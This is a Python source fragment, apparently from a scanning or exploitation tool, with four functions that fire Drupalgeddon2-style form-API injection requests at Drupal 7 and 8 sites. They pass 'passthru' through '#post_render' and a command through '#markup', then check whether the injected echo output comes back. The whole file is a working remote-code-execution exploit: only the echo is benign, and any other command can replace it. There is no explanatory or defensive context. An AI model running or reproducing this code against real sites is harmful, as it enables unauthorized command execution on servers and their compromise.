def isPwnAbleWithQ(host): signature = ulti.genSignature() get_params = {'q': 'user/password', 'name[#post_render][]': 'passthru', 'name[#type]': 'markup', 'name[#markup]': 'echo ' + signature} post_params = {'form_id': 'user_pass', '_triggering_element_name': 'name'} try: r = requests.post(host, data=post_params, params=get_params, verify=False, timeout=20) except Exception as e: # print e return False m = re.search(r'<input type="hidden" name="form_build_id"' ' value="([^"]+)"', r.text) if m: found = m.group(1) get_params = {'q': 'file/ajax/name/#value/' + found} post_params = {'form_build_id': found} res = requests.post(host, data=post_params, params=get_params) detect = bool(re.search(signature, res.text)) n = bool(re.search('echo ' + signature, res.text)) if detect and not n: return True else: return False
def exploitD7Clean(host): signature = ulti.genSignature() if(host[-1:] != '/'): host += '/' url = host + 'user/password' get_params = {'name[#post_render][]': 'passthru', 'name[#type]': 'markup', 'name[#markup]': 'echo ' + signature} post_params = {'form_id': 'user_pass', '_triggering_element_name': 'name'} try: r = requests.post(url, data=post_params, params=get_params, verify=False) except Exception as e: # print e return False m = re.search(r'<input type="hidden" name="form_build_id"' ' value="([^"]+)"', r.text) if m: found = m.group(1) url = ''.join([host, 'file/ajax/name/%23value/', found]) post_params = {'form_build_id': found} # post url, not host res = requests.post(url, data=post_params) detect = bool(re.search(signature, res.text)) n = bool(re.search('echo ' + signature, res.text)) if detect and not n: return True else: return False else: return False
def exploitD8(host): signature = ulti.genSignature() url = ulti.genURLD8(host) post_params = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[a][#post_render][]': 'passthru', 'mail[a][#type]': 'markup', 'mail[a][#markup]': 'echo ' + signature} try: res = requests.post(url, data=post_params, verify=False, timeout=50) except Exception as e: # print e return False detect = bool(re.search(signature, res.text)) n = bool(re.search('echo ' + signature, res.text)) if detect and not n: return True else: return False
def isPwnAble_2018(host, version, headers): signature = ulti.genSignature() version = version[:1] if version == '7': get_params = { 'q': 'user/password', 'name[#post_render][]': 'passthru', 'name[#type]': 'markup', 'name[#markup]': ' echo ' + signature } post_params = { 'form_id': 'user_pass', '_triggering_element_name': 'name' } try: r = requests.post(host, data=post_params, params=get_params, verify=False, headers=headers, timeout=1) except: return False m = re.search( r'<input type="hidden" name="form_build_id"' ' value="([^"]+)"', r.text) if m: found = m.group(1) get_params = {'q': 'file/ajax/name/#value/' + found} post_params = {'form_build_id': found} res = requests.post(host, data=post_params, params=get_params, headers=headers, timeout=1) detect = bool(re.search(signature, res.text)) if detect: return True else: return False if version == '8': host = ''.join([ host, 'user/register?element_parents=account/mail/%23', 'value&ajax_form=1&_wrapper_format=drupal_ajax' ]) post_params = { 'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[a][#post_render][]': 'passthru', 'mail[a][#type]': 'markup', 'mail[a][#markup]': ' echo ' + signature } try: r = requests.post(host, data=post_params, verify=False, headers=headers, timeout=1) except: return False m = bool(re.search(signature, r.text)) if m: return True else: return False